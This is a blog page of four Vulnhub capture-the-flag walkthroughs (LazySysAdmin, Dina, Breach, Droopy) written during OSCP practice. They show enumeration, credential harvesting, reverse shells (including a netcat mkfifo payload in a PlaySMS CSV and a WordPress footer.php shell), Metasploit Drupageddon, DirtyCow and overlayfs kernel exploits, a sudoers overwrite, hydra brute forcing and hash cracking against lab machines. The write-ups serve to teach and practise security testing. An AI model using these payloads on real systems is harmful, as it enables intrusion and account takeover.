VULNHUB – LAZYSYSADMIN WALKTHROUGH

May 1, 2018May 1, 2018 / walkingdeadhun / Leave a comment

Foreword

After I have successfully failed my first OSCP exam, I’m still in progress to practice and learn from these machines.

Enumeration

Let’s start enumeration. First of all check the website with nikto,nmap and of course browse the site manually and check if we could get some hint.

NMAP

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 172.16.132.131
|_  error: Closing link: (nmap@172.16.132.131) [Client exited]

- Nikto v2.1.6/2.1.5
+ Target Host: 172.16.132.134
+ Target Port: 80
+ GET Server leaks inodes via ETags, header found with file /, fields: 0x8ce8 0x5560ea23d23c0
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: GET /old/: Directory indexing found.
+ GET Entry '/old/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /test/: Directory indexing found.
+ GET Entry '/test/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: GET /Backnode_files/: Directory indexing found.
+ GET Entry '/Backnode_files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ GET "robots.txt" contains 4 entries which should be manually viewed.
+ OPTIONS Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: GET /apache/: Directory indexing found.
+ OSVDB-3092: GET /apache/: This might be interesting...
+ OSVDB-3092: GET /old/: This might be interesting...
+ GET Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ GET Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: GET /test/: This might be interesting...
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ GET Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ GET /wordpress/: A WordPress installation was found.
+ GET /phpmyadmin/: phpMyAdmin directory found

phpMyAdmin and WordPress are also present. Tried a few login combinations with popular username/password pairs but no luck. On the WordPress website I found two interesting posts from Admin:

“My name is Togie“.

This could be a username, so note this.

I like yogibear Do you like yogibear?

Is it a password??

Tried to login as togie with the yogiebear password on the wp-admin site but still no luck…. Enumerate further.

Samba share

Found a share$ folder which – of course – is password protected. Try out our previously found words; yes, the togie/yogibear pair opened a new door.

It looks like the share contains the whole wordpress site and some hints.

Deets.txt

CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

Todolist.txt

Prevent users from being able to view to web root using the local file browser

Our admin was super lazy, because we can reach the web root. I can bet that the 12345 password will be useful later.

Harvesting credentials – wp-config.php

Found the login credentials in the wp-config.php file, so we can login as admin.

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

Reverse shell from WordPress admin panel

I was as lazy as our admin. So on the admin panel go to Appearance/Editor and replace footer.php code with a reverse php shell code. Create the listener on our Kali machine at port 4443.

Update the settings, reload the site and enjoy the reverse shell.

root@kali:~# netcat -lvvp 4443
listening on [any] 4443 ...
172.16.132.134: inverse host lookup failed: Unknown host
connect to [172.16.132.131] from (UNKNOWN) [172.16.132.134] 57730
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
 20:37:32 up 32 min,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1178): Inappropriate ioctl for device
bash: no job control in this shell
www-data@LazySysAdmin:/$

At this point I have to note that the Inspire IRC at port 6667 possibly has a buffer overflow vulnerability, but at this time I choose a simpler method and not going in that way. If I will have time for that, a later post will cover this way.

Buffer Overflow in Inspire IRCd → port 6667

	https://www.cvedetails.com/cve/CVE-2012-1836/

Privilege Escalation

I have run linenum.py script which is quite popular in privesc methods. At this point I was totally stucked. I forgot to apply the KISS principle (Keep-It-Super-Simple). MySQL has UDF vulnerability, but not on this machine.

Togie user is part of the sudo,adm etc. group so I have to find a way to login with that user. No vulnerable service, no misconfigured executable, no usable word-writable files/directories (or I still have to learn a lot….)

After some time I remembered something….

So when I cooled down and tried possibly everything, I reread my previous notes. What if Togie using the password mentioned in the Deets.txt file? Let’s try out this; the next few lines will speak to itself…

www-data@LazySysAdmin:/$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@LazySysAdmin:/$ su - togie
su - togie
Password: 12345

togie@LazySysAdmin:~$ sudo -l
sudo -l
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ su -
su -
Password: 12345

su: Authentication failure
togie@LazySysAdmin:~$ sudo su -
sudo su -
root@LazySysAdmin:~# 
root@LazySysAdmin:~# cat /root/proof.txt
cat /root/proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~#

The other method which I forgot to use earlier, the ssh bruteforce method. Using metasploit’s burnett_top_500.txt wordlist with hydra also a good option.

[ATTEMPT] target 172.16.132.134 - login "togie" - pass "password" - 1 of 0 [child 500] (0/0)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "123456" - 2 of 0 [child 500] (0/1)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345678" - 3 of 0 [child 500] (0/2)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "1234" - 4 of 0 [child 500] (0/3)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "qwerty" - 5 of 0 [child 500] (0/4)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "12345" - 6 of 0 [child 500] (0/5)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "dragon" - 7 of 0 [child 500] (0/6)
[ATTEMPT] target 172.16.132.134 - login "togie" - pass "pussy" - 8 of 0 [child 500] (0/7)
[22][ssh] host: 172.16.132.134   login: togie   password: 12345
[STATUS] attack finished for 172.16.132.134 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-05-01 13:04:16

Acknowledgement

Thank you for this machine, I learned a lot and still have to learn.

Enumerate,enumerate,enumerate…. Enumeration is the key.

If you are still on progress with OSCP training/exam the best advice you get is the quote mentioned above. At the end you will understand what does it mean.

Dina 1.0 Walkthrough – Vulnhub

October 21, 2017October 24, 2017 / walkingdeadhun / 3 Comments

Another great vulnhub virtual machine for beginners – especially for me :). It was fun to test this machine – so thank you Touhid!

Information Gathering

I used nmap and nikto to gather some information.

Nikto results:

+ Target IP: 192.168.1.132 + Target Hostname: dina.lan + Target Port: 80 + Using Encoding: Random URI encoding (non-UTF8) + Start Time: 2017-10-18 18:39:12 (GMT2) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Server leaks inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 15:46:52 2017 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + OSVDB-3268: /secure/: Directory indexing found. + OSVDB-3268: /secure/: Directory indexing found. + OSVDB-3268: /tmp/: Directory indexing found. + OSVDB-3092: /tmp/: This might be interesting... + 7444 requests: 0 error(s) and 11 item(s) reported on remote host + End Time: 2017-10-18 18:39:39 (GMT2) (27 seconds)

I have checked all paths above and found some interesting strings on /nothing. Found the following strings in the comment of the source code:

#my secret pass
freedom
password
helloworld!
diana
iloveroot

It looks like we found some passwords. Nice. Let’s check the other path: /secure. It contains a passwords protected backup.zip file. So I tried the passwords above and successfully unpacked it with the password freedom.
I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file.... uname: touhid password: ****** url : /SecreTSMSgatwayLogin

Ok check that secret SMS Gateway. Tried to login with the username touhid and with the passwords found earlier. The login pair was touhid:diana.

The first thing what I usually do when identify a web application is check exploit-db for available exploits.
PlaySMS 1.4 - 'import.php' Remote Code Execution | php/webapps/42044.txt PlaySMS 1.4 - 'sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt PlaySMS 1.4 - Remote Code Execution | php/webapps/42038.txt PlaySms 0.7 - SQL Injection | linux/remote/404.pl PlaySms 0.8 - 'index.php' Cross-Site Scripting | php/webapps/26871.txt PlaySms 0.9.3 - Multiple Local/Remote File Inclusions | php/webapps/7687.txt PlaySms 0.9.5.2 - Remote File Inclusion | php/webapps/17792.txt PlaySms 0.9.9.2 - Cross-Site Request Forgery | php/webapps/30177.txt

This is all what I need. Touhid did a great job on finding the vulnerabilities in this application. At least 3 different kind of ways to run system commands through php system() function.

All right it’s time to get a remote shell.

Gaining remote shell

I tried to run system commands as described in 42044.txt. I was trying a lot, simply nc host port -e /bin/bash didn’t worked because this netcat was an openbsd version and “-e” option is missing from the openbsd version. A few minutes research and I had created a csv file with the following content:

Name,Email,Department
<?php $cmd='rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.109 7777 > /tmp/f 2>&1';system($cmd); ?>,2,3

Luckily I got shell!!!

Privilege escalation

Running whoami told me that my current user is www-data. Okay, check the system. Running netstat -tlpn, a mysql server is running on this machine. In the SecreTSMSgatwayLogin directory was a config.php file. I checked this file and found the login and password pair for the database.

root:hello@mysql

Then selected the playsms database and found the user table, and the password hashes:

mysql hashes:

| admin_78f3198ce97ae2bdddb15cc25d559c6f |
| touhid_3a23bb515e06d0e944ff916e79a7775c

The findmyhash command didn’t find the password in the public database. I was too lazy to fire up oclhashcat and brute-force the hash, so moved on.

I cannot get higher privileges through mysql system command so I wanted another way to get root access.

cat /etc/*-release:

DISTRIB_ID=Ubuntu DISTRIB_RELEASE=12.04 DISTRIB_CODENAME=precise DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

Okay let’s invite our dirty friend….

DirtyCow

I am too lazy….Really… At this point I knew what to use…. I’ve got a little experience from earlier vulnhub machines and used the following exploit from exploit-db to enumerate privileges:40839.c
I was lucky, gcc was present on that machine and the exploit compiled without errors.

./exploit 1234

After a few minutes the root user firefart was created with the password 1234. Okay, check the root directory for the flag.

firefart@Dina:/# cat /root/flag.txt cat /root/flag.txt ________ _________ \________\--------___ ___ ____----------/_________/ \_______\----\\\\\\ //_ _ \\ //////-------/________/ \______\----\\|| (( ~|~ ))) ||//------/________/ \_____\---\\ ((\ = / ))) //----/_____/ \____\--\_))) \ _)))---/____/ \__/ ((( (((_/ | -))) - ))

root password is : hello@3210
easy one …..but hard to guess…..
but i think u dont need root password……
u already have root shelll….

CONGO………
FLAG : 22d06624cd604a0626eb5a2992a6f2e6

Thank you Touhid M.Shaikh for the fun. It was a pleasure to play with this machine.

Vulnhub – Breach 1.0 walkthrough

July 8, 2016July 8, 2016 / walkingdeadhun / Leave a comment

First let’s see what we got. I did a basic nmap scan:

nmap

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques but those didn’t work, it said that all ports are filtered. I checked manually if port 80 is open or not than I fired up Nikto, nothing interesting.

Capture

Let’s watch those images. Voila, a little hint:

Okay, check that source code. Found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or encoded string. I don’t know why, my first thought was that it is a base64 encoded string. I had to decode the string twice, and that gave me a username:password pair.

source_base64

Did some investigation and found a CMS portal called IMPRESSCMS (clicked on Employee portal on initech.html). Let’s see if we can log in with our username/password pair. Login successful, nice. We have 3 messages in Inbox. Lets see the first:

keyfile

I downloaded the keyfile located at the root of the website, and found out that this is a java keystore file. Read the 2 other messages but those didn’t help me too much. My first thought was proved itself, an active IDS/IPS is present. I searched for exploits related to impresscms but the one that could work were being trolled:

At this point I got stucked a bit. Tried dirbuster, different exploits, XSS vulnerabilities on CMS site but nothing. Tried to brute force the admin account, but no luck. Investigated the other pictures and sites deeper, nothing interesting. One option left on CMS site, check pgibbons profile. I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

Opened the pcap file, it contained data but I didn’t have a private rsa key to decrypt. WAIT! I have one! I had to export the RSA private key from .keyfile and then I was able to look what the heck happened:

pcap creds

Tomcat Manager running at port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/ | login successful with wireshark credentials). What more the wireshark capture gave us a hint that we can run shell commands with the help of cmd.jsp. But where it is? It has been uploaded but the resource cannot be found, the author or a system service may deleted it. A little googling helped me at this part. I can upload any kind of war files and there is a cmd.war file on the internet (Laudanum) that seems to be the same. So I uploaded it, searched for netcat and made a reverse shell back to my kali box.

cmd_war commands_with_jsp

netcat

First I tried to exploit some Ubuntu 14.04 based kernel exploits but all of them failed. Finally gave up probing exploits, instead I sent LinEnum priv checker to the victim machine and did a quick investigation what permissions do I have.

MySQL login was successful without password with username root. Nice. I found Milton’s username and password hash in the database then tried to crack the password with oclHashcat. It was successfully recovered, I tried to change my user from tomcat to milton. It was successful. Another username and password was found but I can’t crack this hash within a reasonable time.

After that changing user from tomcat to milton find a “some_script.sh” file with following content: Nothing here.

Okay dig deeper. Really. Nothing in here…. After some time I found an init script in init.d folder(portly.sh). This little script redirect all traffic to portly scanner. Okay I will use this script to add milton into sudoers group at system startup.

echo “echo “milton ALL=(ALL) ALL” > /etc/sudoers” > /etc/init.d/portly.sh

After system reboot I rebuild my connections, did a quick sudo su with milton and voila, I captured the flag.

Vulnhub – Droopy: v0.2

April 19, 2016April 25, 2016 / walkingdeadhun / Leave a comment

Introducion

This is a quick post about how to hack this vulnerable virtual machine found in Vulnhub website. Just to be clear I am not a security professional, I am just learning and preparing myself to OCSP exam. If you found any mistake please let me know.

Walkthrough

First we do some network discovery with netdiscover:

netdisc

We see that host is at 192.168.1.159. Let’s do nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

NMAP shows in this machine there is a website hosted by Apache webserver and Drupal is running on it. I’ve investigated the site and it requires login and password. Fire up Metasploit Framework and let’s do a quick check, find an exploit suitable to our victim. Because Drupal uses MySQL database its quite trivial that a SQL injection could work.

drupal_search

I choosed the third one and fingers crossed. Boom, we have a meterpreter connection.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.159 yes The target address
RPORT 80 yes The target port
TARGETURI / yes The target URI of the Drupal installation
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.1.200 yes The listen address
LPORT 4444 yes The listen port
Exploit target:

Id Name
— —-
0 Drupal 7.0 – 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Nice news, let’s lurk around and get informations out of the system. I used sysinfo command and let’s see what is it.

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel. I am trying my luck and check if this machine is vulnerable to overlayfs vulnerability or not, what user persmissions I have, am I able to compile my exploit with gcc and run it.

First transfer the exploit to /tmp folder with meterpreter’s upload command and try to execute it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system, let’s find the flag. Usually flag takes place in the root directory, so let’s see what we have.

dave.tc

Dave.tc? Wut? After googling a bit I found that .tc extension could be a TrueCrypt password protected file. Google says that TrueCrypt are discontinued and password protected volumes can be hacked with proper program and with a good dictionary. My first thought was OclHashcat because I have an AMD card, and truecracker in Kali Linux supports Nvidia card (only?). I didn’t do research if it supports AMD too, because I am happy with OclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have rockyou wordlist so check /var/mail:

mail

Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

Exhausted. Nothing. At this point several hours later still nothing. I tried to apply rules (best64), different dictionaries, nothing. The last sentence also could give a hint, I did a dictionary combinaton attack ( downloaded lyrics from The Jam, did a dictionary from this and combinated with rockyou). Still no luck. Will I fail at this point? This was so easy until this point. TRY HARDER! So I did a break and when I sit front of my computer again I had clue. What if I am trying with wrong hashing algorithm? Some guys on hashcat forums mentioned that should try SHA512 algorithm instead of RipeMD160. Okay, fire up OclHashcat again.

oclHashcat64.exe -a 0 -m 6221 -p : –session=all -o “D:\Penetration\HASHGPUCRACK\dave_found.txt” –outfile-format=3 -w 3 –gpu-temp-disable “C:\Users\media\Desktop\dave.tc” “D:\Penetration\wordlist\rockyou.txt”

After a couple of minutes it finished. Cracked. Okay, lets install TrueCrypt and check what we got. When it prompt for password I tried Copy/Paste and….. Wrong password. OMG what happening? Again CTRL+C CTRL+V, still no luck. Could it be possible? What if I type the password instead of copy/paste? Yes, it was my fault. It shows the drive, mounted to drive H:

drive